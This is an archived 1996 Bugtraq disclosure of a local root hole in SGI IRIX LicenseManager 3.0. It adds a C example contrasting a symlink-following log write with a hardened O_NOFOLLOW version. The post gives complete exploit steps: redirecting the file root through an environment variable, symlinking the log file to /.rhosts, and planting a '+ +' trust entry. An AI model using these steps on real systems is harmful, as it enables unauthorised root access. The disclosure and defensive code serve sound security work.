Bugtraq mailing list archives
Irix: new LicenseManager is safe? No way
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Fri, 22 Nov 1996 19:41:13 -0600
Howdy,

ABSTRACT

LicenseManager 3.0, recently announced by SGI as a replacement for the buggy version 1.0, is still suid and still highly insecure, and allows any local user with access to an X screen to gain root privileges.

Fix: chmod -s /usr/etc/LicenseManager

Move on to your next message now if you are busy.

Full Story:

I guess many of you read this:

On Thu, 21 Nov 1996, SGI Security Coordinator wrote:
Recently, a root compromise security issue with the LicenseManager program was publicly announced. <...> Silicon Graphics Inc. has investigated these issues and recommends the following steps for neutralizing exposure.
This is not correct, so to say. SGI didn't exactly listen to what I said; I thought it was clear, but... My point was: LicenseManager is far too complex to be safe and suid at the same time. I just pointed at one of the many ways of exploiting it; there's much more in stock. I'm actually really frustrated; it's kind of disappointing when you're trying to help in fixing an important security problem and are just being ignored. I'm not a big authority, I agree, but what I was saying isn't my idea; a short look at sendmail history would help anybody learn why being suid is bad and in what ways. But SGI has just ignored the warning, and LicenseManager 3.0, which is "neutralizing" the problem, is still suid. Yes, LM 3.0 is far safer than 1.0, I agree with that. So now it's not a newborn and a milk bottle but a teenager and a pack of gum in his locker in the school (which he apparently forgot to lock). Huge leap forward.

I said it once, and I'll say it again; maybe repeating it a few times will actually make the people in charge _read_ it:

PROGRAMS AS COMPLEX AS LICENSEMANAGER SHOULD NOT BE SUID. PERIOD.

Those who liked that short tutorial about the cdplayer crack may appreciate a quick reinforcement. Exams are getting closer, so I'll be brief. It actually took me several hours to hack it all the way through, so only the main steps will be shown.

As one can easily notice, LicenseManager 3.0 (LM30 for short) is considerably enhanced as compared to LM 1.0. For example, if one tries to repeat the recently published exploit for LM 1.0, it won't work, because /.rhosts is not in /var/flexlm/licensefile.db. So a brute force attack won't work. RTFMing can help to find it out right away, and as far as I can tell it seems to work. So let's just abandon the whole idea of forging a license file and go investigate what other file I/O the program actually does. Most important files live in /var/flexlm. Every lazy hacker should have a special set of LS_COLOR options (and a color-aware ls, of course). Such settings should always include assigning a very bright color to files with the .log extension, so that you can see right away what you're going to hack in a few moments. /var/flexlm/license.dat.log is not in that writable files database, but obviously LM30 writes to it. Exactly what we need. But how to use it?

Now it's time for step #2, and our friend strings tells us how. Among the wide variety of environment variables used by LM30, one is standing alone: LICENSEMGR_FILE_ROOT. The very name says what it's for -- getting root (on the system, but I guess the developers meant something else. Whatever). Some playing with it will quickly show that indeed that variable sets the root directory for LM30. We can now pick a new root directory:

mkdir -p /tmp/var/flexlm

so that we have an exact equivalent of /var/flexlm, just with /tmp prepended to it. LICENSEMGR_FILE_ROOT will make LM30 accept our understanding of what the right root directory is.

setenv LICENSEMGR_FILE_ROOT /tmp

Now, LM30 deals with licenses, so let's make one; we'll need it.

cd /tmp/var/flexlm
cat > license.dat
#
# FLEXlm license file
#
FEATURE \
+ + blah sgifd 1.00 01-jan-0 0 blah
^D

The license is all set. And of course we need a log file, don't we?

ln -s /.rhosts license.dat.log

Now check that your DISPLAY is set correctly, and, ladies and gentlemen, please welcome:

LicenseManager &

The front panel will show that indeed LM30 thinks of our little joke as a license. Let's update it: click the Update... button. It will show four fields for us to fill out. Putting blah in each of them will be fine. Or whatever you feel is good input. Some people like foo, I like blah. And, finally, click Apply.

Obviously, LM30 will be pissed at us, and it will log the record of our nasty behaviour and pop up some error dialog box -- just ignore it and go straight back to the original command line:

cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE \
+ + blah sgifd 1.00 01-jan-0 0 blah

You know what happens next, I guess.

Moral: no one will protect your machine except you. If you want your machine to be secure, don't just accept what vendors give you -- try it by breaking it. And complain loudly and publicly if it's broken. Baby doesn't cry -- mother doesn't worry; if a bug is there and isn't being exploited, chances are no one will ever bother fixing it, even if it's an obvious one. If somebody tells you that SGI just couldn't have anticipated this one, laugh in his face (or smile politely if it's her face, or vice versa, whatever you feel is right). Not checking for a symlink before the write in a suid program is one of the most common and lame bugs that ever existed.

SGI: please, don't just fix this bug and say it's OK now; more of them are right there. Don't repeat others' mistakes; don't make a program suid unless it's absolutely necessary. Make a survey among your customers and ask them what they prefer: not allowing regular users to tweak with licences, or having a security hole? I bet I know the answer.

Acknowledgements. I want to thank everybody who sent me comments about this stuff. I really appreciate your e-mails.

cheers,
yuri

Always speaking for myself and only for myself.
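The symlink-following log write the post walks through, and the check that stops it, as an added example in C that is not code from the original post or from SGI. LicenseManager's source is not public, so the logger below is a stand-in that reproduces the behaviour described: a privileged process appends to <root>/var/flexlm/license.dat.log, with <root> taken from LICENSEMGR_FILE_ROOT. The function names, the scratch directory under /tmp and the "victim" file standing in for /.rhosts are my own assumptions. The hardened version also shows the design-level point the post makes, that a suid program must not let the environment relocate its files.

```c
/* Added example, not code from the original post or from SGI.  LicenseManager
 * is closed source; this logger is a stand-in that reproduces the behaviour
 * the post describes.  Names (pick_file_root, log_append_unsafe,
 * log_append_safe, run_demo, LOG_REL) and the /tmp scratch setup are mine. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define LOG_REL "/var/flexlm/license.dat.log"   /* log path below the file root */

/* A suid program must not let an environment variable relocate its data files.
 * privileged != 0 stands for getuid() != geteuid(); then the override from
 * LICENSEMGR_FILE_ROOT is ignored and "" (the real system root) is used. */
const char *pick_file_root(const char *env_root, int privileged)
{
    if (env_root != NULL && !privileged)
        return env_root;
    return "";
}

/* Vulnerable pattern: fopen("a") follows a symlink, so a link planted at the
 * log path turns the root-owned append into a write to any file on the box. */
int log_append_unsafe(const char *root, const char *msg)
{
    char path[256];
    snprintf(path, sizeof path, "%s" LOG_REL, root);
    FILE *f = fopen(path, "a");
    if (f == NULL)
        return -1;
    fputs(msg, f);
    return fclose(f) == 0 ? 0 : -1;
}

/* Hardened pattern: O_NOFOLLOW makes open() fail with ELOOP when the final
 * component is a symlink, and fstat() on the open descriptor (no race with a
 * separate lstat()) rejects anything that is not a regular file with exactly
 * one link, since a hard link is the other way to alias a privileged write. */
int log_append_safe(const char *root, const char *msg)
{
    char path[256];
    struct stat st;
    snprintf(path, sizeof path, "%s" LOG_REL, root);
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                            /* errno == ELOOP for a symlink */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    size_t len = strlen(msg);
    ssize_t n = write(fd, msg, len);
    close(fd);
    return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* Rebuild the post's setup in a scratch directory (assumed writable /tmp):
 * a "victim" file standing in for /.rhosts and <root>/var/flexlm/license.dat.log
 * as a symlink to it.  Returns 1 if the logger wrote into the victim through
 * the link, 0 if it refused, -1 if the scratch setup failed. */
int run_demo(int hardened)
{
    char root[] = "/tmp/lmdemo.XXXXXX";
    char var[64], dir[64], link[96], victim[64], buf[64];
    const char *msg = "+ + blah\n";           /* the .rhosts line an attacker wants */
    int fd, rc;
    ssize_t n;

    if (mkdtemp(root) == NULL)
        return -1;
    snprintf(var, sizeof var, "%s/var", root);
    snprintf(dir, sizeof dir, "%s/var/flexlm", root);
    snprintf(link, sizeof link, "%s" LOG_REL, root);
    snprintf(victim, sizeof victim, "%s/victim", root);
    if (mkdir(var, 0700) < 0 || mkdir(dir, 0700) < 0)
        return -1;
    if ((fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0)
        return -1;
    close(fd);
    if (symlink(victim, link) < 0)            /* ln -s /.rhosts license.dat.log */
        return -1;

    rc = hardened ? log_append_safe(root, msg) : log_append_unsafe(root, msg);

    fd = open(victim, O_RDONLY);              /* did the victim receive the line? */
    n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    if (fd >= 0)
        close(fd);
    unlink(link); unlink(victim); rmdir(dir); rmdir(var); rmdir(root);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return (rc == 0 && strstr(buf, "+ + blah") != NULL) ? 1 : 0;
}

int main(void)
{
    printf("fopen(\"a\") through symlink wrote victim: %d\n", run_demo(0));
    printf("O_NOFOLLOW open through symlink wrote victim: %d\n", run_demo(1));
    return 0;
}
```

Build with `cc -o lmdemo lmdemo.c` and run as an ordinary user; the unsafe logger reports 1 (the line went through the link into the victim file) and the hardened one 0. O_NOFOLLOW is a later addition to open(); where it is unavailable, an lstat() before open() still leaves a check-to-use race, which is why the fstat() on the already-open descriptor is the check worth keeping. None of this replaces the post's actual recommendation: a program this complex should not be suid at all, and chmod -s is the mitigation until it isn't.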